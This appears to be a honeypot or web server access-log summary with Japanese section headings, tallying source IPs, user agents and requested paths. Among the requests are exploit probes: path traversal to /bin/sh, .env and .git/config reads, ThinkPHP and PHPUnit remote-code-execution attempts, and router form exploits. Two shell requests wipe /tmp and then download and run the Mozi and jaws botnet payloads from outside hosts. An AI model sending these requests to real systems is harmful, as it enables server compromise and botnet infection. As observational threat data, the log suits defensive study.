1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
11 | 3.214.215.20 | United States |
1 | 3.236.88.220 | United States |
1 | 20.3.233.241 | United States |
1 | 20.55.53.144 | United States |
3 | 34.204.192.185 | United States |
1 | 42.119.149.163 | Vietnam |
2 | 45.33.80.243 | United States |
1 | 45.56.108.128 | United States |
1 | 45.79.128.205 | United States |
1 | 45.79.181.94 | United States |
1 | 45.79.181.251 | United States |
1 | 45.135.232.28 | Russia |
19 | 54.36.115.221 | France |
9 | 54.37.79.75 | France |
10 | 68.183.203.70 | United States |
1 | 80.94.92.24 | Romania |
10 | 83.97.73.89 | Germany |
1 | 87.120.88.17 | Bulgaria |
2 | 87.251.64.11 | Russia |
1 | 94.23.133.43 | France |
2 | 102.67.226.52 | Ivory Coast |
1 | 103.206.130.254 | India |
2 | 109.237.97.180 | Russia |
1 | 120.231.225.191 | China |
1 | 134.209.21.73 | United States |
1 | 143.244.175.97 | United States |
2 | 162.142.125.216 | United States |
2 | 162.142.125.217 | United States |
1 | 172.104.11.4 | United States |
1 | 172.104.11.51 | United States |
1 | 172.105.128.11 | United States |
2 | 172.105.128.12 | United States |
1 | 178.62.81.94 | United States |
2 | 179.43.177.244 | Panama |
2 | 184.105.139.68 | United States |
1 | 185.11.61.117 | Russia |
4 | 185.142.236.43 | Seychelles |
1 | 185.180.143.141 | Portugal |
1 | 190.109.228.141 | Bolivia |
1 | 192.155.90.118 | United States |
1 | 192.155.90.220 | United States |
2 | 193.32.162.190 | Romania |
1 | 193.35.18.52 | Bulgaria |
1 | 193.42.32.124 | Bulgaria |
1 | 193.118.53.194 | United States |
1 | 198.199.112.107 | United States |
1 | 198.199.116.154 | United States |
1 | 198.235.24.109 | United States |
1 | 198.235.24.137 | United States |
1 | 212.227.3.204 | Germany |
1 | 220.94.228.163 | South Korea |
UserAgent一覧
件数 | UserAgent |
---|---|
38 | - |
1 | Hello, World |
2 | Hello, world |
1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) |
1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Linux; U; Android 8.0.0; zh-cn; Mi Note 2 Build/OPR1.170623.032) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.128 Mobile Safari/537.36 XiaoMi/MiuiBrowser/10.1.1 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 |
31 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
5 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
1 | Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/18.0.130791545 Mobile/14A5345a Safari/600.1.4 |
1 | Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/99.3 Mobile/15E148 Safari/605.1.15 |
1 | Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 |
3 | Mozilla/5.0 zgrab/0.x |
1 | Mozilla/5.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
3 | - |
||
1 | MGLNDD_13.67.44.234_80 |
||
1 | \x03 |
||
1 | \x16\x03\x01\x01H\x01 |
||
2 | \x16\x03\x01\x01\xfb\x01 |
||
1 | \x16\x03\x01\x02 |
||
22 | \x16\x03\x01 |
||
1 | \x16\x03\x03\x01\x8e\x01 |
||
1 | `` | ||
1 | GET | /../../mnt/mtd/Config/Account1 |
HTTP/1.1 |
1 | GET | /../../mnt/mtd/Config/Account2 |
HTTP/1.1 |
32 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | /1.php |
HTTP/1.1 |
1 | GET | /99vt |
HTTP/1.1 |
1 | GET | /99vu |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /PgtDEABFs6f9qdire2zVGTUlOof |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /aaaaaaaaaaaaaaaaaaaaaaaaaqr |
HTTP/1.1 |
1 | GET | /bundle.js |
HTTP/1.1 |
1 | GET | /client/get_targets |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /data/.svn/wc.db |
HTTP/1.1 |
1 | GET | /druid/index.html |
HTTP/1.1 |
6 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /files/ |
HTTP/1.1 |
1 | GET | /gate.php |
HTTP/1.1 |
1 | GET | /geoip/ |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /lib/.svn/wc.db |
HTTP/1.1 |
1 | GET | /plugins/.svn/wc.db |
HTTP/1.1 |
3 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+103[.]16[.]161[.]29/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//190[.]109[.]228[.]141:47854/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /systembc/password.php |
HTTP/1.0 |
1 | GET | /upl.php |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /web/.svn/wc.db |
HTTP/1.1 |
1 | GET | http[:]//www[.]google[.]com/ |
HTTP/1.0 |
1 | HEAD | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
5 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |